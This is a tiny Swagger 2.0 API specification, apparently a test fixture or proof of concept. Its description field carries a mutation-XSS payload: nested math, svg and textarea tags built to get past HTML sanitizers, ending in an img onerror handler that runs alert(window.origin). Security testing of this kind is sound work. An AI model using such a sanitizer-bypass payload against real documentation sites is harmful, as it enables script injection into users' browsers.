swagger: '2.0'
info:
  version: "0.0.1"
  title: Example Title
  description: <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(window.origin)'>">
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
